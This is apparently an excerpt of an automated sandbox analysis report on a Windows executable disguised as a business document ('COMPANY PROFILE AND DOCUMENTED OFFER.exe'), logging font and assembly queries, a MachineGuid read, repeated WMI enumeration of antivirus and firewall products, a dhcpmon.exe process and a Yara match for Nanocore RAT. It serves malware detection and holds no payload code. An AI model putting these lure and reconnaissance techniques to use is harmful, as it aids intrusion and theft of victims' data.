Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
